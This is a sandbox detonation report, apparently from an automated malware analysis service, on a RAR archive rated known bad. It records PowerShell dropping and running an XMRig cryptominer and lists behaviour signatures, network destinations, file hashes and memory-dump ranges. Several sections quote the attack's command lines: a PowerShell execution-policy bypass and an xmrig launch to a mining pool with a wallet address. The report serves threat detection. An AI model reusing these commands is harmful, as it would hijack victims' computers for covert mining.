Analysis Overview
SHA256
08f3805606e1d457ed9e80b975bee0320651e3d5626e9e7cb896fd45e8fd0f7b
Threat Level: Known bad
The file main2.rar was found to be: Known bad.
Malicious Activity Summary
XMRig Miner payload
xmrig
Blocklisted process makes network request
Executes dropped EXE
Command and Scripting Interpreter: PowerShell
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious behavior: LoadsDriver
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-25 15:43
Signatures
Analysis: behavioral27
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 17:19
Platform
win10v2004-20240508-en
Max time kernel
1791s
Max time network
1778s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 380 wrote to memory of 3832 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 380 wrote to memory of 3832 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 218.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.173.189.20.in-addr.arpa | udp |
Files
memory/380-0-0x00007FFF04093000-0x00007FFF04095000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ojnlrccv.3d4.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/380-10-0x000001E2FB5D0000-0x000001E2FB5F2000-memory.dmp
memory/380-11-0x00007FFF04090000-0x00007FFF04B51000-memory.dmp
memory/380-12-0x00007FFF04090000-0x00007FFF04B51000-memory.dmp
memory/380-14-0x00007FFF04090000-0x00007FFF04B51000-memory.dmp
memory/380-15-0x000001E2FB860000-0x000001E2FB872000-memory.dmp
memory/380-16-0x000001E2FB850000-0x000001E2FB85A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3832-47-0x000001D28C220000-0x000001D28C240000-memory.dmp
memory/3832-48-0x000001D28C3B0000-0x000001D28C3D0000-memory.dmp
memory/3832-49-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-50-0x000001D28C3D0000-0x000001D28C3F0000-memory.dmp
memory/3832-51-0x000001D28C3F0000-0x000001D28C410000-memory.dmp
memory/3832-52-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/380-53-0x00007FFF04093000-0x00007FFF04095000-memory.dmp
memory/380-54-0x00007FFF04090000-0x00007FFF04B51000-memory.dmp
memory/380-56-0x00007FFF04090000-0x00007FFF04B51000-memory.dmp
memory/3832-55-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-57-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-58-0x000001D28C3D0000-0x000001D28C3F0000-memory.dmp
memory/3832-59-0x000001D28C3F0000-0x000001D28C410000-memory.dmp
memory/3832-60-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-61-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-62-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-63-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-64-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-65-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-66-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-67-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-68-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-69-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-70-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-71-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-72-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-73-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-74-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-75-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-76-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-77-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-78-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-79-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-80-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-81-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-82-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-83-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-84-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-85-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-86-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-87-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-88-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-89-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-90-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-91-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-92-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-93-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-94-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-95-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-96-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-97-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-98-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-99-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-100-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-101-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-102-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-103-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-104-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-105-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-106-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-107-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-108-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-109-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-110-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-111-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-112-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-113-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-114-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-115-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-116-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-117-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-118-0x00007FF613D50000-0x00007FF614983000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:53
Platform
win10-20240404-en
Max time kernel
1799s
Max time network
1750s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4144 wrote to memory of 1108 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4144 wrote to memory of 1108 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.117.168.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | tcp | |
| US | 8.8.8.8:53 | 164.189.21.2.in-addr.arpa | udp |
Files
memory/4144-2-0x00007FFD5A823000-0x00007FFD5A824000-memory.dmp
memory/4144-5-0x00000263215B0000-0x00000263215D2000-memory.dmp
memory/4144-8-0x00007FFD5A820000-0x00007FFD5B20C000-memory.dmp
memory/4144-9-0x0000026339BB0000-0x0000026339C26000-memory.dmp
memory/4144-10-0x00007FFD5A820000-0x00007FFD5B20C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ncihguv0.2de.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4144-25-0x00007FFD5A820000-0x00007FFD5B20C000-memory.dmp
memory/4144-29-0x00007FFD5A823000-0x00007FFD5A824000-memory.dmp
memory/4144-30-0x00007FFD5A820000-0x00007FFD5B20C000-memory.dmp
memory/4144-31-0x00007FFD5A820000-0x00007FFD5B20C000-memory.dmp
memory/4144-32-0x00007FFD5A820000-0x00007FFD5B20C000-memory.dmp
memory/4144-52-0x0000026339D30000-0x0000026339D42000-memory.dmp
memory/4144-65-0x0000026339BA0000-0x0000026339BAA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1108-94-0x000001AF51BE0000-0x000001AF51C00000-memory.dmp
memory/1108-95-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-96-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-97-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-98-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-99-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-100-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-101-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-102-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-103-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-104-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-105-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-106-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-107-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-108-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-109-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-110-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-111-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-112-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-113-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-114-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-115-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-116-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-117-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-118-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-119-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-120-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-121-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-122-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-123-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-124-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-125-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-126-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-127-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-128-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-129-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-130-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-131-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-132-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-133-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-134-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-135-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-136-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-137-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-138-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-139-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-140-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-141-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-142-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-143-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-144-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-145-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-146-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-147-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-148-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-149-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-150-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-151-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-152-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-153-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-154-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-155-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-156-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-157-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 17:05
Platform
win11-20240419-en
Max time kernel
1799s
Max time network
1769s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
